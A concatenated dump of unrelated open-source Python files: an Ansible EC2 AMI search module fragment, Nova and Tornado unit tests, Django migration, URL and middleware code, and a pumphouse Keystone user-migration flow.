results.append(data)
if sort == 'tag':
if not sort_tag:
module.fail_json(msg="'sort_tag' option must be given with 'sort=tag'")
results.sort(key=lambda e: e['tags'][sort_tag], reverse=(sort_order=='descending'))
elif sort:
results.sort(key=lambda e: e[sort], reverse=(sort_order=='descending'))
try:
if sort and sort_start and sort_end:
results = results[int(sort_start):int(sort_end)]
elif sort and sort_start:
results = results[int(sort_start):]
elif sort and sort_end:
results = results[:int(sort_end)]
except TypeError:
module.fail_json(msg="Please supply numeric values for sort_start and/or sort_end")
module.exit_json(results=results)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
if __name__ == '__main__':
main()
| attakei/openshift-ansible | playbooks/aws/openshift-cluster/library/ec2_ami_find.py | Python | apache-2.0 | 9,777 |
# Copyright (c) 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for common notifications."""
import copy
from oslo.config import cfg
from nova.compute import flavors
from nova.compute import task_states
from nova.compute import vm_states
from nova import context
from nova import db
from nova.network import api as network_api
from nova import notifications
from nova import test
from nova.tests import fake_network
from nova.tests import fake_notifier
CONF = cfg.CONF
CONF.import_opt('compute_driver', 'nova.virt.driver')
class NotificationsTestCase(test.TestCase):
def setUp(self):
super(NotificationsTestCase, self).setUp()
self.net_info = fake_network.fake_get_instance_nw_info(self.stubs, 1,
1)
def fake_get_nw_info(cls, ctxt, instance):
self.assertTrue(ctxt.is_admin)
return self.net_info
self.stubs.Set(network_api.API, 'get_instance_nw_info',
fake_get_nw_info)
fake_network.set_stub_network_methods(self.stubs)
fake_notifier.stub_notifier(self.stubs)
self.addCleanup(fake_notifier.reset)
self.flags(compute_driver='nova.virt.fake.FakeDriver',
network_manager='nova.network.manager.FlatManager',
notify_on_state_change="vm_and_task_state",
host='testhost')
self.user_id = 'fake'
self.project_id = 'fake'
self.context = context.RequestContext(self.user_id, self.project_id)
self.instance = self._wrapped_create()
def _wrapped_create(self, params=None):
instance_type = flavors.get_flavor_by_name('m1.tiny')
sys_meta = flavors.save_flavor_info({}, instance_type)
inst = {}
inst['image_ref'] = 1
inst['user_id'] = self.user_id
inst['project_id'] = self.project_id
inst['instance_type_id'] = instance_type['id']
inst['root_gb'] = 0
inst['ephemeral_gb'] = 0
inst['access_ip_v4'] = '1.2.3.4'
inst['access_ip_v6'] = 'feed:5eed'
inst['display_name'] = 'test_instance'
inst['hostname'] = 'test_instance_hostname'
inst['node'] = 'test_instance_node'
inst['system_metadata'] = sys_meta
if params:
inst.update(params)
return db.instance_create(self.context, inst)
def test_send_api_fault_disabled(self):
self.flags(notify_api_faults=False)
notifications.send_api_fault("http://example.com/foo", 500, None)
self.assertEqual(0, len(fake_notifier.NOTIFICATIONS))
def test_send_api_fault(self):
self.flags(notify_api_faults=True)
exception = None
try:
# Get a real exception with a call stack.
raise test.TestingException("junk")
except test.TestingException as e:
exception = e
notifications.send_api_fault("http://example.com/foo", 500, exception)
self.assertEqual(1, len(fake_notifier.NOTIFICATIONS))
n = fake_notifier.NOTIFICATIONS[0]
self.assertEqual(n.priority, 'ERROR')
self.assertEqual(n.event_type, 'api.fault')
self.assertEqual(n.payload['url'], 'http://example.com/foo')
self.assertEqual(n.payload['status'], 500)
self.assertIsNotNone(n.payload['exception'])
def test_notif_disabled(self):
# test config disable of the notifications
self.flags(notify_on_state_change=None)
old = copy.copy(self.instance)
self.instance["vm_state"] = vm_states.ACTIVE
old_vm_state = old['vm_state']
new_vm_state = self.instance["vm_state"]
old_task_state = old['task_state']
new_task_state = self.instance["task_state"]
notifications.send_update_with_states(self.context, self.instance,
old_vm_state, new_vm_state, old_task_state, new_task_state,
verify_states=True)
notifications.send_update(self.context, old, self.instance)
self.assertEqual(0, len(fake_notifier.NOTIFICATIONS))
def test_task_notif(self):
# test config disable of just the task state notifications
self.flags(notify_on_state_change="vm_state")
        # we should not get a notification on task state change now
old = copy.copy(self.instance)
self.instance["task_state"] = task_states.SPAWNING
old_vm_state = old['vm_state']
new_vm_state = self.instance["vm_state"]
old_task_state = old['task_state']
new_task_state = self.instance["task_state"]
notifications.send_update_with_states(self.context, self.instance,
old_vm_state, new_vm_state, old_task_state, new_task_state,
verify_states=True)
self.assertEqual(0, len(fake_notifier.NOTIFICATIONS))
# ok now enable task state notifications and re-try
self.flags(notify_on_state_change="vm_and_task_state")
notifications.send_update(self.context, old, self.instance)
self.assertEqual(1, len(fake_notifier.NOTIFICATIONS))
def test_send_no_notif(self):
        # test that no notification is sent when neither vm nor task state changes:
old_vm_state = self.instance['vm_state']
new_vm_state = self.instance['vm_state']
old_task_state = self.instance['task_state']
new_task_state = self.instance['task_state']
notifications.send_update_with_states(self.context, self.instance,
old_vm_state, new_vm_state, old_task_state, new_task_state,
service="compute", host=None, verify_states=True)
self.assertEqual(0, len(fake_notifier.NOTIFICATIONS))
def test_send_on_vm_change(self):
# pretend we just transitioned to ACTIVE:
params = {"vm_state": vm_states.ACTIVE}
(old_ref, new_ref) = db.instance_update_and_get_original(self.context,
self.instance['uuid'], params)
notifications.send_update(self.context, old_ref, new_ref)
self.assertEqual(1, len(fake_notifier.NOTIFICATIONS))
def test_send_on_task_change(self):
# pretend we just transitioned to task SPAWNING:
params = {"task_state": task_states.SPAWNING}
(old_ref, new_ref) = db.instance_update_and_get_original(self.context,
self.instance['uuid'], params)
notifications.send_update(self.context, old_ref, new_ref)
self.assertEqual(1, len(fake_notifier.NOTIFICATIONS))
def test_no_update_with_states(self):
notifications.send_update_with_states(self.context, self.instance,
vm_states.BUILDING, vm_states.BUILDING, task_states.SPAWNING,
task_states.SPAWNING, verify_states=True)
self.assertEqual(0, len(fake_notifier.NOTIFICATIONS))
def test_vm_update_with_states(self):
notifications.send_update_with_states(self.context, self.instance,
vm_states.BUILDING, vm_states.ACTIVE, task_states.SPAWNING,
task_states.SPAWNING, verify_states=True)
self.assertEqual(1, len(fake_notifier.NOTIFICATIONS))
notif = fake_notifier.NOTIFICATIONS[0]
payload = notif.payload
access_ip_v4 = self.instance["access_ip_v4"]
access_ip_v6 = self.instance["access_ip_v6"]
display_name = self.instance["display_name"]
hostname = self.instance["hostname"]
node = self.instance["node"]
self.assertEqual(vm_states.BUILDING, payload["old_state"])
self.assertEqual(vm_states.ACTIVE, payload["state"])
self.assertEqual(task_states.SPAWNING, payload["old_task_state"])
self.assertEqual(task_states.SPAWNING, payload["new_task_state"])
self.assertEqual(payload["access_ip_v4"], access_ip_v4)
self.assertEqual(payload["access_ip_v6"], access_ip_v6)
self.assertEqual(payload["display_name"], display_name)
self.assertEqual(payload["hostname"], hostname)
self.assertEqual(payload["node"], node)
def test_task_update_with_states(self):
self.flags(notify_on_state_change="vm_and_task_state")
notifications.send_update_with_states(self.context, self.instance,
vm_states.BUILDING, vm_states.BUILDING, task_states.SPAWNING,
None, verify_states=True)
self.assertEqual(1, len(fake_notifier.NOTIFICATIONS))
notif = fake_notifier.NOTIFICATIONS[0]
payload = notif.payload
access_ip_v4 = self.instance["access_ip_v4"]
access_ip_v6 = self.instance["access_ip_v6"]
display_name = self.instance["display_name"]
hostname = self.instance["hostname"]
self.assertEqual(vm_states.BUILDING, payload["old_state"])
self.assertEqual(vm_states.BUILDING, payload["state"])
self.assertEqual(task_states.SPAWNING, payload["old_task_state"])
self.assertIsNone(payload["new_task_state"])
self.assertEqual(payload["access_ip_v4"], access_ip_v4)
self.assertEqual(payload["access_ip_v6"], access_ip_v6)
self.assertEqual(payload["display_name"], display_name)
self.assertEqual(payload["hostname"], hostname)
def test_update_no_service_name(self):
notifications.send_update_with_states(self.context, self.instance,
vm_states.BUILDING, vm_states.BUILDING, task_states.SPAWNING,
None)
self.assertEqual(1, len(fake_notifier.NOTIFICATIONS))
# service name should default to 'compute'
notif = fake_notifier.NOTIFICATIONS[0]
self.assertEqual('compute.testhost', notif.publisher_id)
def test_update_with_service_name(self):
notifications.send_update_with_states(self.context, self.instance,
vm_states.BUILDING, vm_states.BUILDING, task_states.SPAWNING,
None, service="testservice")
self.assertEqual(1, len(fake_notifier.NOTIFICATIONS))
        # service name should be the one we specified
notif = fake_notifier.NOTIFICATIONS[0]
self.assertEqual('testservice.testhost', notif.publisher_id)
def test_update_with_host_name(self):
notifications.send_update_with_states(self.context, self.instance,
vm_states.BUILDING, vm_states.BUILDING, task_states.SPAWNING,
None, host="someotherhost")
self.assertEqual(1, len(fake_notifier.NOTIFICATIONS))
        # service name still defaults to 'compute', but with the host we specified
notif = fake_notifier.NOTIFICATIONS[0]
self.assertEqual('compute.someotherhost', notif.publisher_id)
def test_payload_has_fixed_ip_labels(self):
info = notifications.info_from_instance(self.context, self.instance,
self.net_info, None)
self.assertIn("fixed_ips", info)
self.assertEqual(info["fixed_ips"][0]["label"], "test1")
def test_send_access_ip_update(self):
notifications.send_update(self.context, self.instance, self.instance)
self.assertEqual(1, len(fake_notifier.NOTIFICATIONS))
notif = fake_notifier.NOTIFICATIONS[0]
payload = notif.payload
access_ip_v4 = self.instance["access_ip_v4"]
access_ip_v6 = self.instance["access_ip_v6"]
self.assertEqual(payload["access_ip_v4"], access_ip_v4)
self.assertEqual(payload["access_ip_v6"], access_ip_v6)
def test_send_name_update(self):
param = {"display_name": "new_display_name"}
new_name_inst = self._wrapped_create(params=param)
notifications.send_update(self.context, self.instance, new_name_inst)
self.assertEqual(1, len(fake_notifier.NOTIFICATIONS))
notif = fake_notifier.NOTIFICATIONS[0]
payload = notif.payload
old_display_name = self.instance["display_name"]
new_display_name = new_name_inst["display_name"]
self.assertEqual(payload["old_display_name"], old_display_name)
self.assertEqual(payload["display_name"], new_display_name)
def test_send_no_state_change(self):
called = [False]
def sending_no_state_change(context, instance, **kwargs):
called[0] = True
self.stubs.Set(notifications, '_send_instance_update_notification',
sending_no_state_change)
notifications.send_update(self.context, self.instance, self.instance)
self.assertTrue(called[0])
def test_fail_sending_update(self):
def fail_sending(context, instance, **kwargs):
raise Exception('failed to notify')
self.stubs.Set(notifications, '_send_instance_update_notification',
fail_sending)
notifications.send_update(self.context, self.instance, self.instance)
self.assertEqual(0, len(fake_notifier.NOTIFICATIONS))
| CiscoSystems/nova | nova/tests/test_notifications.py | Python | apache-2.0 | 13,358 |
# Generated by Django 2.1.7 on 2019-04-23 06:03
import diventi.accounts.models
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('accounts', '0050_auto_20190421_2252'),
]
operations = [
migrations.AlterModelManagers(
name='diventiuser',
managers=[
('objects', diventi.accounts.models.DiventiUserManager()),
],
),
]
| flavoi/diventi | diventi/accounts/migrations/0051_auto_20190423_0803.py | Python | apache-2.0 | 452 |
# Copyright 2010 http://www.collabq.com
import logging
from django.conf import settings
from django.http import HttpResponseRedirect
from common import api
from common import exception
class VerifyInstallMiddleware(object):
def process_request(self, request):
logging.info("VerifyInstallMiddleware")
logging.info("Path %s" % request.path)
    if request.path != '/install':
      try:
        api.actor_get(api.ROOT, settings.ROOT_NICK)
        logging.info("Root Exists")
      except:
        logging.info("Root Does Not Exist")
return HttpResponseRedirect('/install') | CollabQ/CollabQ | middleware/verify.py | Python | apache-2.0 | 608 |
"""schmankerl URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from schmankerlapp import views
from django.contrib.auth import views as auth_views
from django.conf.urls.static import static
from django.conf import settings
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^$', views.home, name='home'),
#restaurant
url(r'^restaurant/sign-in/$', auth_views.login,
{'template_name': 'restaurant/sign-in.html'},
name = 'restaurant-sign-in'),
url(r'^restaurant/sign-out', auth_views.logout,
{'next_page': '/'}, name='restaurant-sign-out'),
url(r'^restaurant/sign-up', views.restaurant_sign_up,
name='restaurant-sign-up'),
url(r'^restaurant/$', views.restaurant_home, name='restaurant-home'),
url(r'^restaurant/account/$', views.restaurant_account, name='restaurant-account'),
url(r'^restaurant/meal/$', views.restaurant_meal, name='restaurant-meal'),
url(r'^restaurant/meal/add$', views.restaurant_add_meal, name='restaurant-add-meal'),
url(r'^restaurant/order/$', views.restaurant_order, name='restaurant-order'),
url(r'^restaurant/report/$', views.restaurant_report, name='restaurant-report'),
#sign-up, sign-in, sign-out
url(r'^api/social/', include('rest_framework_social_oauth2.urls')),
# /convert-token (sign-in, sign-out)
# /revoke-token (sign-out)
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| MarxDimitri/schmankerl | schmankerl/urls.py | Python | apache-2.0 | 2,082 |
#!/usr/bin/env python
#
# Copyright 2014 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function
from contextlib import closing
import os
import socket
from tornado.concurrent import Future
from tornado.netutil import bind_sockets, Resolver
from tornado.queues import Queue
from tornado.tcpclient import TCPClient, _Connector
from tornado.tcpserver import TCPServer
from tornado.testing import AsyncTestCase, gen_test
from tornado.test.util import skipIfNoIPv6, unittest, refusing_port, skipIfNonUnix, skipOnTravis
from tornado.gen import TimeoutError
# Fake address families for testing. Used in place of AF_INET
# and AF_INET6 because some installations do not have AF_INET6.
AF1, AF2 = 1, 2
class TestTCPServer(TCPServer):
def __init__(self, family):
super(TestTCPServer, self).__init__()
self.streams = []
self.queue = Queue()
sockets = bind_sockets(None, 'localhost', family)
self.add_sockets(sockets)
self.port = sockets[0].getsockname()[1]
def handle_stream(self, stream, address):
self.streams.append(stream)
self.queue.put(stream)
def stop(self):
super(TestTCPServer, self).stop()
for stream in self.streams:
stream.close()
class TCPClientTest(AsyncTestCase):
def setUp(self):
super(TCPClientTest, self).setUp()
self.server = None
self.client = TCPClient()
def start_server(self, family):
if family == socket.AF_UNSPEC and 'TRAVIS' in os.environ:
self.skipTest("dual-stack servers often have port conflicts on travis")
self.server = TestTCPServer(family)
return self.server.port
def stop_server(self):
if self.server is not None:
self.server.stop()
self.server = None
def tearDown(self):
self.client.close()
self.stop_server()
super(TCPClientTest, self).tearDown()
def skipIfLocalhostV4(self):
# The port used here doesn't matter, but some systems require it
# to be non-zero if we do not also pass AI_PASSIVE.
Resolver().resolve('localhost', 80, callback=self.stop)
addrinfo = self.wait()
families = set(addr[0] for addr in addrinfo)
if socket.AF_INET6 not in families:
self.skipTest("localhost does not resolve to ipv6")
@gen_test
def do_test_connect(self, family, host, source_ip=None, source_port=None):
port = self.start_server(family)
stream = yield self.client.connect(host, port,
source_ip=source_ip,
source_port=source_port)
server_stream = yield self.server.queue.get()
with closing(stream):
stream.write(b"hello")
data = yield server_stream.read_bytes(5)
self.assertEqual(data, b"hello")
def test_connect_ipv4_ipv4(self):
self.do_test_connect(socket.AF_INET, '127.0.0.1')
def test_connect_ipv4_dual(self):
self.do_test_connect(socket.AF_INET, 'localhost')
@skipIfNoIPv6
def test_connect_ipv6_ipv6(self):
self.skipIfLocalhostV4()
self.do_test_connect(socket.AF_INET6, '::1')
@skipIfNoIPv6
def test_connect_ipv6_dual(self):
self.skipIfLocalhostV4()
if Resolver.configured_class().__name__.endswith('TwistedResolver'):
self.skipTest('TwistedResolver does not support multiple addresses')
self.do_test_connect(socket.AF_INET6, 'localhost')
def test_connect_unspec_ipv4(self):
self.do_test_connect(socket.AF_UNSPEC, '127.0.0.1')
@skipIfNoIPv6
def test_connect_unspec_ipv6(self):
self.skipIfLocalhostV4()
self.do_test_connect(socket.AF_UNSPEC, '::1')
def test_connect_unspec_dual(self):
self.do_test_connect(socket.AF_UNSPEC, 'localhost')
@gen_test
def test_refused_ipv4(self):
cleanup_func, port = refusing_port()
self.addCleanup(cleanup_func)
with self.assertRaises(IOError):
yield self.client.connect('127.0.0.1', port)
def test_source_ip_fail(self):
'''
Fail when trying to use the source IP Address '8.8.8.8'.
'''
self.assertRaises(socket.error,
self.do_test_connect,
socket.AF_INET,
'127.0.0.1',
source_ip='8.8.8.8')
def test_source_ip_success(self):
'''
Success when trying to use the source IP Address '127.0.0.1'
'''
self.do_test_connect(socket.AF_INET, '127.0.0.1', source_ip='127.0.0.1')
@skipIfNonUnix
def test_source_port_fail(self):
'''
Fail when trying to use source port 1.
'''
self.assertRaises(socket.error,
self.do_test_connect,
socket.AF_INET,
'127.0.0.1',
source_port=1)
@gen_test
def test_connect_timeout(self):
timeout = 0.05
class TimeoutResolver(Resolver):
def resolve(self, *args, **kwargs):
return Future() # never completes
with self.assertRaises(TimeoutError):
yield TCPClient(resolver=TimeoutResolver()).connect(
'1.2.3.4', 12345, timeout=timeout)
class TestConnectorSplit(unittest.TestCase):
def test_one_family(self):
# These addresses aren't in the right format, but split doesn't care.
primary, secondary = _Connector.split(
[(AF1, 'a'),
(AF1, 'b')])
self.assertEqual(primary, [(AF1, 'a'),
(AF1, 'b')])
self.assertEqual(secondary, [])
def test_mixed(self):
primary, secondary = _Connector.split(
[(AF1, 'a'),
(AF2, 'b'),
(AF1, 'c'),
(AF2, 'd')])
self.assertEqual(primary, [(AF1, 'a'), (AF1, 'c')])
self.assertEqual(secondary, [(AF2, 'b'), (AF2, 'd')])
class ConnectorTest(AsyncTestCase):
class FakeStream(object):
def __init__(self):
self.closed = False
def close(self):
self.closed = True
def setUp(self):
super(ConnectorTest, self).setUp()
self.connect_futures = {}
self.streams = {}
self.addrinfo = [(AF1, 'a'), (AF1, 'b'),
(AF2, 'c'), (AF2, 'd')]
def tearDown(self):
# Unless explicitly checked (and popped) in the test, we shouldn't
# be closing any streams
for stream in self.streams.values():
self.assertFalse(stream.closed)
super(ConnectorTest, self).tearDown()
def create_stream(self, af, addr):
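        # Stands in for TCPClient's stream factory: _Connector calls this for
        # each candidate address and gets back a (stream, future) pair whose
        # resolution the test controls via resolve_connect().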
stream = ConnectorTest.FakeStream()
self.streams[addr] = stream
future = Future()
self.connect_futures[(af, addr)] = future
return stream, future
def assert_pending(self, *keys):
self.assertEqual(sorted(self.connect_futures.keys()), sorted(keys))
def resolve_connect(self, af, addr, success):
future = self.connect_futures.pop((af, addr))
if success:
future.set_result(self.streams[addr])
else:
self.streams.pop(addr)
future.set_exception(IOError())
# Run the loop to allow callbacks to be run.
self.io_loop.add_callback(self.stop)
self.wait()
def assert_connector_streams_closed(self, conn):
for stream in conn.streams:
self.assertTrue(stream.closed)
def start_connect(self, addrinfo):
conn = _Connector(addrinfo, self.create_stream)
# Give it a huge timeout; we'll trigger timeouts manually.
future = conn.start(3600, connect_timeout=self.io_loop.time() + 3600)
return conn, future
def test_immediate_success(self):
conn, future = self.start_connect(self.addrinfo)
self.assertEqual(list(self.connect_futures.keys()),
[(AF1, 'a')])
self.resolve_connect(AF1, 'a', True)
self.assertEqual(future.result(), (AF1, 'a', self.streams['a']))
def test_immediate_failure(self):
# Fail with just one address.
conn, future = self.start_connect([(AF1, 'a')])
self.assert_pending((AF1, 'a'))
self.resolve_connect(AF1, 'a', False)
self.assertRaises(IOError, future.result)
def test_one_family_second_try(self):
conn, future = self.start_connect([(AF1, 'a'), (AF1, 'b')])
self.assert_pending((AF1, 'a'))
self.resolve_connect(AF1, 'a', False)
self.assert_pending((AF1, 'b'))
self.resolve_connect(AF1, 'b', True)
self.assertEqual(future.result(), (AF1, 'b', self.streams['b']))
def test_one_family_second_try_failure(self):
conn, future = self.start_connect([(AF1, 'a'), (AF1, 'b')])
self.assert_pending((AF1, 'a'))
self.resolve_connect(AF1, 'a', False)
self.assert_pending((AF1, 'b'))
self.resolve_connect(AF1, 'b', False)
self.assertRaises(IOError, future.result)
def test_one_family_second_try_timeout(self):
conn, future = self.start_connect([(AF1, 'a'), (AF1, 'b')])
self.assert_pending((AF1, 'a'))
# trigger the timeout while the first lookup is pending;
# nothing happens.
conn.on_timeout()
self.assert_pending((AF1, 'a'))
self.resolve_connect(AF1, 'a', False)
self.assert_pending((AF1, 'b'))
self.resolve_connect(AF1, 'b', True)
self.assertEqual(future.result(), (AF1, 'b', self.streams['b']))
def test_two_families_immediate_failure(self):
conn, future = self.start_connect(self.addrinfo)
self.assert_pending((AF1, 'a'))
self.resolve_connect(AF1, 'a', False)
self.assert_pending((AF1, 'b'), (AF2, 'c'))
self.resolve_connect(AF1, 'b', False)
self.resolve_connect(AF2, 'c', True)
self.assertEqual(future.result(), (AF2, 'c', self.streams['c']))
def test_two_families_timeout(self):
conn, future = self.start_connect(self.addrinfo)
self.assert_pending((AF1, 'a'))
conn.on_timeout()
self.assert_pending((AF1, 'a'), (AF2, 'c'))
self.resolve_connect(AF2, 'c', True)
self.assertEqual(future.result(), (AF2, 'c', self.streams['c']))
# resolving 'a' after the connection has completed doesn't start 'b'
self.resolve_connect(AF1, 'a', False)
self.assert_pending()
def test_success_after_timeout(self):
conn, future = self.start_connect(self.addrinfo)
self.assert_pending((AF1, 'a'))
conn.on_timeout()
self.assert_pending((AF1, 'a'), (AF2, 'c'))
self.resolve_connect(AF1, 'a', True)
self.assertEqual(future.result(), (AF1, 'a', self.streams['a']))
# resolving 'c' after completion closes the connection.
self.resolve_connect(AF2, 'c', True)
self.assertTrue(self.streams.pop('c').closed)
def test_all_fail(self):
conn, future = self.start_connect(self.addrinfo)
self.assert_pending((AF1, 'a'))
conn.on_timeout()
self.assert_pending((AF1, 'a'), (AF2, 'c'))
self.resolve_connect(AF2, 'c', False)
self.assert_pending((AF1, 'a'), (AF2, 'd'))
self.resolve_connect(AF2, 'd', False)
# one queue is now empty
self.assert_pending((AF1, 'a'))
self.resolve_connect(AF1, 'a', False)
self.assert_pending((AF1, 'b'))
self.assertFalse(future.done())
self.resolve_connect(AF1, 'b', False)
self.assertRaises(IOError, future.result)
def test_one_family_timeout_after_connect_timeout(self):
conn, future = self.start_connect([(AF1, 'a'), (AF1, 'b')])
self.assert_pending((AF1, 'a'))
conn.on_connect_timeout()
        # The connector closes all of its streams on connect timeout, so we
        # explicitly pop the pending connect future here.
self.connect_futures.pop((AF1, 'a'))
self.assertTrue(self.streams.pop('a').closed)
conn.on_timeout()
        # Once the future is set with TimeoutError, the connector will not
        # try the next possible address.
self.assert_pending()
self.assertEqual(len(conn.streams), 1)
self.assert_connector_streams_closed(conn)
self.assertRaises(TimeoutError, future.result)
def test_one_family_success_before_connect_timeout(self):
conn, future = self.start_connect([(AF1, 'a'), (AF1, 'b')])
self.assert_pending((AF1, 'a'))
self.resolve_connect(AF1, 'a', True)
conn.on_connect_timeout()
self.assert_pending()
self.assertEqual(self.streams['a'].closed, False)
        # the successful stream has been popped from conn.streams
self.assertEqual(len(conn.streams), 0)
# streams in connector should be closed after connect timeout
self.assert_connector_streams_closed(conn)
self.assertEqual(future.result(), (AF1, 'a', self.streams['a']))
def test_one_family_second_try_after_connect_timeout(self):
conn, future = self.start_connect([(AF1, 'a'), (AF1, 'b')])
self.assert_pending((AF1, 'a'))
self.resolve_connect(AF1, 'a', False)
self.assert_pending((AF1, 'b'))
conn.on_connect_timeout()
self.connect_futures.pop((AF1, 'b'))
self.assertTrue(self.streams.pop('b').closed)
self.assert_pending()
self.assertEqual(len(conn.streams), 2)
self.assert_connector_streams_closed(conn)
self.assertRaises(TimeoutError, future.result)
def test_one_family_second_try_failure_before_connect_timeout(self):
conn, future = self.start_connect([(AF1, 'a'), (AF1, 'b')])
self.assert_pending((AF1, 'a'))
self.resolve_connect(AF1, 'a', False)
self.assert_pending((AF1, 'b'))
self.resolve_connect(AF1, 'b', False)
conn.on_connect_timeout()
self.assert_pending()
self.assertEqual(len(conn.streams), 2)
self.assert_connector_streams_closed(conn)
self.assertRaises(IOError, future.result)
def test_two_family_timeout_before_connect_timeout(self):
conn, future = self.start_connect(self.addrinfo)
self.assert_pending((AF1, 'a'))
conn.on_timeout()
self.assert_pending((AF1, 'a'), (AF2, 'c'))
conn.on_connect_timeout()
self.connect_futures.pop((AF1, 'a'))
self.assertTrue(self.streams.pop('a').closed)
self.connect_futures.pop((AF2, 'c'))
self.assertTrue(self.streams.pop('c').closed)
self.assert_pending()
self.assertEqual(len(conn.streams), 2)
self.assert_connector_streams_closed(conn)
self.assertRaises(TimeoutError, future.result)
def test_two_family_success_after_timeout(self):
conn, future = self.start_connect(self.addrinfo)
self.assert_pending((AF1, 'a'))
conn.on_timeout()
self.assert_pending((AF1, 'a'), (AF2, 'c'))
self.resolve_connect(AF1, 'a', True)
        # once one of the streams succeeds, the connector closes all the others
self.connect_futures.pop((AF2, 'c'))
self.assertTrue(self.streams.pop('c').closed)
self.assert_pending()
self.assertEqual(len(conn.streams), 1)
self.assert_connector_streams_closed(conn)
self.assertEqual(future.result(), (AF1, 'a', self.streams['a']))
def test_two_family_timeout_after_connect_timeout(self):
conn, future = self.start_connect(self.addrinfo)
self.assert_pending((AF1, 'a'))
conn.on_connect_timeout()
self.connect_futures.pop((AF1, 'a'))
self.assertTrue(self.streams.pop('a').closed)
self.assert_pending()
conn.on_timeout()
        # Once the future is set with TimeoutError, the connector will not
        # fall back to the secondary address.
self.assert_pending()
self.assertEqual(len(conn.streams), 1)
self.assert_connector_streams_closed(conn)
self.assertRaises(TimeoutError, future.result)
| legnaleurc/tornado | tornado/test/tcpclient_test.py | Python | apache-2.0 | 16,665 |
# Copyright (c) 2014 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from taskflow.patterns import linear_flow
from pumphouse import exceptions
from pumphouse import events
from pumphouse import task
LOG = logging.getLogger(__name__)
class RetrieveUser(task.BaseCloudTask):
def execute(self, user_id):
user = self.cloud.keystone.users.get(user_id)
self.cloud.identity.fetch(user.id)
return user.to_dict()
class EnsureUser(task.BaseCloudTask):
def execute(self, user_info, tenant_info):
try:
user = self.cloud.keystone.users.find(name=user_info["name"])
# TODO(akscram): Current password should be replaced by temporary.
except exceptions.keystone_excs.NotFound:
user = self.cloud.keystone.users.create(
name=user_info["name"],
# TODO(akscram): Here we should generate a temporary
# password for the user and use them
# along the migration process.
# The RepairUserPasswords should repair
# original after all operations.
password="default",
email=user_info["email"],
tenant_id=tenant_info["id"] if tenant_info else None,
enabled=user_info["enabled"],
)
self.created_event(user)
return user.to_dict()
def created_event(self, user):
LOG.info("Created user: %s", user)
events.emit("create", {
"id": user.id,
"type": "user",
"cloud": self.cloud.name,
"data": user.to_dict(),
}, namespace="/events")
class EnsureOrphanUser(EnsureUser):
def execute(self, user_info):
        return super(EnsureOrphanUser, self).execute(user_info, None)
class EnsureUserRole(task.BaseCloudTask):
def execute(self, user_info, role_info, tenant_info):
try:
self.cloud.keystone.tenants.add_user(tenant_info["id"],
user_info["id"],
role_info["id"])
except exceptions.keystone_excs.Conflict:
pass
else:
self.role_assigned_event(role_info, user_info, tenant_info)
return user_info
def role_assigned_event(self, role_info, user_info, tenant_info):
LOG.info("Created role %s assignment for user %s in tenant %s",
role_info["id"], user_info["id"], tenant_info["id"])
def migrate_membership(context, user_id, role_id, tenant_id):
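    """Builds a task that grants ``role_id`` to ``user_id`` within ``tenant_id``.

    The task is rebound to the ensure-steps of the user, role and tenant, so
    it is wired to run after those resources exist in the destination cloud.
    """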
user_ensure = "user-{}-ensure".format(user_id)
role_ensure = "role-{}-ensure".format(role_id)
tenant_ensure = "tenant-{}-ensure".format(tenant_id)
user_role_ensure = "user-role-{}-{}-{}-ensure".format(user_id, role_id,
tenant_id)
    # Renamed from ``task`` to avoid shadowing the imported ``task`` module.
    user_role_task = EnsureUserRole(context.dst_cloud,
                                    name=user_role_ensure,
                                    provides=user_role_ensure,
                                    rebind=[user_ensure, role_ensure,
                                            tenant_ensure])
    context.store[user_role_ensure] = user_role_ensure
    return user_role_task
def migrate_user(context, user_id, tenant_id=None):
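    """Builds a flow that retrieves a user from the source cloud and ensures
    it exists in the destination cloud, optionally attached to a tenant.
    """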
user_binding = "user-{}".format(user_id)
user_retrieve = "{}-retrieve".format(user_binding)
user_ensure = "{}-ensure".format(user_binding)
flow = linear_flow.Flow("migrate-user-{}".format(user_id))
flow.add(RetrieveUser(context.src_cloud,
name=user_binding,
provides=user_binding,
rebind=[user_retrieve]))
if tenant_id is not None:
tenant_ensure = "tenant-{}-ensure".format(tenant_id)
flow.add(EnsureUser(context.dst_cloud,
name=user_ensure,
provides=user_ensure,
rebind=[user_binding, tenant_ensure]))
else:
flow.add(EnsureUser(context.dst_cloud,
name=user_ensure,
provides=user_ensure,
rebind=[user_binding],
inject={"tenant_info": None}))
context.store[user_retrieve] = user_id
return flow
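# A rough usage sketch (assumes a populated ``context`` object and the usual
# taskflow engine entry point; not part of this module):
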